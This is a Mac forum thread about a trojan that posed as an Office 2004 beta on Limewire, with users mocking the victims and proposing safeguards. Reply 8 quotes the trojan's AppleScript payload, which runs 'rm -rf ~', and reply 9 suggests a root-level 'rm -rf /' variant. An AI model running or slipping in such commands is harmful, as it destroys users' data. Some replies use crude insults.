Ouch - watch out delete you home directory.

Posted:
in macOS edited January 2014

Comments

  • Reply 1 of 14
    kickahakickaha Posts: 8,760member
    Oh for god's sake.



    This has *NOTHING* to do with Intego's FUD.



    This is just user stupidity... they downloaded a file off of *LIMEWIRE* for god's sake, and just ran it willynilly.



    Dumb, dumb, dumb, dumb, dumb.







    Internet 101: Don't take candy from strangers.



    Jeez.
  • Reply 2 of 14
    pbpb Posts: 4,233member
    Quote:

    Originally posted by Addison

    Here is the story.



    It looks like the same generic malicious code that can be written for any operating system with a GUI, being discussed here some time ago. Even for System 1.0. Nothing new. It seems to me that some people try to create fuss about OS X security, since a genuine, original and non-trivial virus is practically very very difficult to write for OS X. I am not saying of course that the threat is not real.
  • Reply 3 of 14
    pbpb Posts: 4,233member
    And you know what, if I want to go internet without minding something doing $hit in my home directory (since this is the most it can do), I have for that an empty guest account, that is without important documents. Don't mind if they wipe guest's home.
  • Reply 4 of 14
    dfilerdfiler Posts: 3,420member
    News flash:

    If you download and run a program, it could delete things.



    "But it had a pretty icon so I double clicked."



    Captain Obvious replies:

    If you cross the road without looking, you can get hit by a car.
  • Reply 5 of 14
    kim kap solkim kap sol Posts: 2,987member
    Yup...case of user stupidity.



    Same thing as picking out a whore at random on the street, bringing her home and realize she's really a he.



    The moral of the story is, you can't just randomly pick a whor...hey, no wait...the moral of the story is, you can't just randomly download anything from the net and have the certainty that it won't be disguised and malicious app/script. There's a certain amount of homework one has to do.
  • Reply 6 of 14
    banchobancho Posts: 1,517member
    A Macworld reader alerted the magazine to the malware after he downloaded the file from Limewire. The reader told Macworld: "I downloaded the file in the hope that perhaps Microsoft had released some sort of public beta. The file unzipped, and to my delight the Microsoft icon looked genuine and trustworthy."



    What a total Jackass(tm).



    Of course MS routinely distributes public betas via Limewire.
  • Reply 7 of 14
    to fall for this one, you must be /really/ stupid. my office x folder is ~200MB. figure w/ compression it could be ~150-125. i did a search for office 2004 and found a few likely suspects all at less than 1 meg. what friggen genius thinks that if i download this 800k dmg, ill be able to play w/ office 2004 before my buddies do!





    edit: make that a 41k .sit file claiming to be a "web install"
  • Reply 8 of 14
    and after carefull dissecting the 41k sit file, it is nothing more than a 1 line applescript with the code:

    Code:


    do shell script "rm -rf ~"







    a simple yet effective (on idiots) trojan
  • Reply 9 of 14
    jlljll Posts: 2,709member
    Quote:

    Originally posted by ThunderPoit

    and after carefull dissecting the 41k sit file, it is nothing more than a 1 line applescript with the code:

    Code:


    do shell script "rm -rf ~"







    a simple yet effective (on idiots) trojan



    Well, it could have been an installer asking for your password and then run "rm -rf /"
  • Reply 10 of 14
    dobbydobby Posts: 794member
    Just write a little java or perl ditty that deletes the home dir. Easy and cross platform. The difference is that unpatched MS OS's will run the code without asking.



    Dobby.
  • Reply 11 of 14
    chychchych Posts: 860member
    Lol, I wonder if I somehow enlightened the author of that Word 2004 trojan. Oh well

    (and I didn't do it!)
  • Reply 12 of 14
    dmgeistdmgeist Posts: 153member
    Maybe we as knowledgeable mac users can collaborate on this matter and make an application that can at the users option either remove rm from all bin directories or add a prompt option to shell scripts.



    This would be useful for institutions or other places with multiple users or people with children who peruse p2p sites.
  • Reply 13 of 14
    kickahakickaha Posts: 8,760member
    You're kidding, right??



    That's like removing the Trash Can from the Finder. It's kind of this useful thing...



    Much easier to use something like (oh damn, can't find the link now) an app to monitor your Downloads folder and warn you about any application that appears. (It does so by looking at the structure and not just the file extension.)



    A Folder Action Script in the Finder could accomplish the same thing.
  • Reply 14 of 14
    mr. memr. me Posts: 3,219member
    Quote:

    Originally posted by dmgeist

    Maybe we as knowledgeable mac users can collaborate on this matter and make an application that can at the users option either remove rm from all bin directories or add a prompt option to shell scripts.



    This would be useful for institutions or other places with multiple users or people with children who peruse p2p sites.




    One would hope that sysadmins don't give root access to those users.
Sign In or Register to comment.